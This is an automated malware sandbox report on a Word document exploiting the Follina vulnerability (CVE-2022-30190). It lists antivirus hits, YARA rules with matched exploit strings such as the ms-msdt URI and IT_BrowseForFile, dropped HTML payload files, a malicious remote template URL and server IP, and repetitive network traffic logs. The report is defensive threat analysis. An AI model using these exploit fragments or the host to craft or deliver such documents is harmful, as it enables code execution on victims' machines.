Edit tour

Windows Analysis Report
fHER4lglqY

Overview

General Information

Sample Name:	fHER4lglqY (renamed file extension from none to docx)
Analysis ID:	685991
MD5:	6878265f91c6cb31618ad8ff45891f60
SHA1:	178c99c6b3ad6e1e835b2325b0d9a023d61d6d64
SHA256:	2f75f6ee9ba9ef599dff95249a32312bb457ea34d5e25dec338b803c312221a0
Infos:

Detection

Follina CVE-2022-30190

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Antivirus detection for dropped file

Contains an external reference to another file

Detected suspicious Microsoft Office reference URL

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Uses insecure TLS / SSL version for HTTPS connection

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1972 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
document.xml.rels	SUSP_Doc_WordXMLRels_May22	Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard, Wojciech Cieslak	0x39:$a1: <Relationships 0x3ba:$a2: TargetMode="External" 0x3b2:$x1: .html!
document.xml.rels	INDICATOR_OLE_RemoteTemplate	Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents	ditekSHen	0x375:$olerel: relationships/oleObject 0x38e:$target1: Target="http 0x3ba:$mode: TargetMode="External

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x4e06:$a: PCWDiagnostic 0x4dfa:$sa3: ms-msdt 0x4e5d:$sb3: IT_BrowseForFile=
sslproxydump.pcap	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x4de9:$re1: location.href = "ms-msdt:
sslproxydump.pcap	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D314135.htm	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x198d:$a: PCWDiagnostic 0x1981:$sa3: ms-msdt 0x19e4:$sb3: IT_BrowseForFile=
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D314135.htm	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1970:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D314135.htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF80B4F.htm	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x198d:$a: PCWDiagnostic 0x1981:$sa3: ms-msdt 0x19e4:$sb3: IT_BrowseForFile=
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF80B4F.htm	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1970:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF80B4F.htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poc[1].htm	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x198d:$a: PCWDiagnostic 0x1981:$sa3: ms-msdt 0x19e4:$sb3: IT_BrowseForFile=
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poc[1].htm	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1970:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poc[1].htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
Click to see the 4 entries

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: fHER4lglqY.docx

Avira: detected

Multi AV Scanner detection for submitted file

Source: fHER4lglqY.docx	Virustotal: Detection: 25%	Perma Link
Source: fHER4lglqY.docx	Metadefender: Detection: 22%	Perma Link
Source: fHER4lglqY.docx	ReversingLabs: Detection: 48%

Antivirus detection for URL or domain

Source: https://2hell.nl/follina/poc.html

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: https://2hell.nl/follina/poc.html

Virustotal: Detection: 10%

Perma Link

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poc[1].htm	Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D314135.htm	Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF80B4F.htm	Avira: detection malicious, Label: JS/CVE-2022-30190.G

Exploits

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D314135.htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF80B4F.htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poc[1].htm, type: DROPPED

Detected suspicious Microsoft Office reference URL

Source: document.xml.rels

Extracted files from sample: https://2hell.nl/follina/poc.html!

Source: unknown	HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49185 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49187 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49173 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49187
